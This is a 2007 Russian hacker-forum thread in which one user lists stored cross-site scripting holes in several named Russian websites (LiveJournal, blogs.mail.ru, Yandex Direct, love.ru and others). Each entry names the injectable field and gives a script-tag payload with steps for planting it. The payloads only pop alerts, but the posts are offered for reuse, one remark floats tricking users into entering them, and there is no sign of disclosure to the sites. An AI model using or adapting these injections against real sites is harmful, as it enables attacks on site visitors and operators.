Несколько активных хсс

Discussion in 'Уязвимости' started by freddi, 23 Feb 2007.

Thread Status:
Not open for further replies.
  1. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    1) http://webfile.ru

    Заливаем любой файл. И в "Описание файла: " вставляем нашу хсс, например:
    Code:
    "><script>alert("freddi")</script>
    При переходе по ссылке с залитым файлом будет вылезать алерт.
    Работает в ие и опере :)))

    2) http://www.livejournal.com

    Здесь более кривая хсс.

    Создаем новую запись, тема не важна.
    а) Тип сообщения должен быть «HTML», вставляем в сообщение
    Code:
    "><script>alert("freddi")</script>
    потом переходим на «Визуальный редактор», вылезает алерт, далее опять вставляем в сообщение
    Code:
    "><script>alert("freddi")</script>
    нажимаем отправить в дневник, вылезает еще один алерт. При просмотре этой записи все норм, но если нажать редактировать то вылезет алерт.
    б) Тип сообщения должен быть «HTML», вставляем в сообщение:
    Code:
    <p class="MsoNormal" style="MARGIN: 0cm 0cm 0pt"><span lang="EN-US" style="mso-ansi-language: EN-US"><font size="3"><font face="Times New Roman">12</font></font></span></p><script type="text/javascript">alert("freddi")</script>
    сохраняем в журнал, далее при редактировании если перейти на «Визуальный редактор» вылезет алерт.

    Работает только в ие.
     
    #1 freddi, 23 Feb 2007
    Last edited: 24 Feb 2007
    4 people like this.
  2. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    Ну я тоже незнаю, просто запостил.
    Можно конечно пользователя заставить все это прописать)))
     
  3. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    3) http://blogs.mail.ru

    Точно такая же как и в жж.
    Создаем новый блог. Выбираем "Простой текст" или "Расширенный формат" пишем:
    Code:
    "><script>alert("freddi")</script>
    Сохраняем, и при редактировании этого блога вылезет алерт.

    Работает только в ие.
     
  4. Abra

    Abra Member

    Joined:
    17 Sep 2005
    Messages:
    278
    Likes Received:
    51
    Reputations:
    29
    ну как же - в мое ЖЖ раньше посетителей приветствовал алерт мол "велкам ту май ЖЖ" =))))))
     
  5. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Багу на blogs.mail.ru уже закрыли! все фильтруеться, а ведь не прошло и 8 часов, пипц!=(
     
  6. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    4) http://direct.yandex.ru

    Опять же кривая :)

    Мои кампании->Настройки пользователя->Ваши ФИО

    Code:
    "><script>alert("freddi")</script>
    теперь при просмотре «Настройки пользователя» вылезает алерт или при нажимании на «Дать объявление»
    Но что-то это объявление не отправляется, тк там что-то с сервером, может в будущем это все выльется в нормальную активную хсс :))))
     
  7. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    5) http://love.ru

    Вот эта нормальная активная хсс :)

    Добавляем коментарий в дневнике от анонимного пользователя. Вместо имени пишем:

    Code:
    "><script>alert("xss")</script> 
    Текст сообщения неважен.
     
    #7 freddi, 27 Feb 2007
    Last edited: 27 Feb 2007
    3 people like this.
  8. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    http://blogs.tks.ru

    Все тоже самое))
    Оставляем комментарий от анонимного пользователя.
    Вместо имени пишем:

    Code:
    "><script>alert("xss")</script> 
    Остальное неважно.

    2 Constantine
    Багу на майле не прикрыли, мож я тупо конечно объяснил, но все работает.
     
    #8 freddi, 28 Feb 2007
    Last edited: 28 Feb 2007
    1 person likes this.
  9. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Обьяснил ты все нормально; сразу как только прочитал твою мессягу проверил- все работало, через пару часов перепроверил <> уже фильтровались.
     
  10. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Ребята, меня смешит)))) Вы имеете возможность вводить абсолютно нефильтруемые данные для проведения XSS атака, но при этом умудряетесь делать так, что ваши XSS работают _только_ под IE и Opera =)))
    А ты попробуй сделать в следующий раз вот так:
    Мне почему-то кажется что так даже FF здасться :D
     
    1 person likes this.
  11. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    www.dvddom.ru

    Добавляем отзыв о фильме. Уязвимо поле "Текст:"
    Работает в ие и опере.
     
    1 person likes this.
  12. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    www.mediaguide.ru

    Уязвимо поле текст.



    PS Моя последняя хсс, все больше не буду :)
     
  13. Koller

    Koller Elder - Старейшина

    Joined:
    25 Jul 2005
    Messages:
    402
    Likes Received:
    246
    Reputations:
    302
    Для Xss есть спец. тема...
    Посему эту закрываю...
     
Thread Status:
Not open for further replies.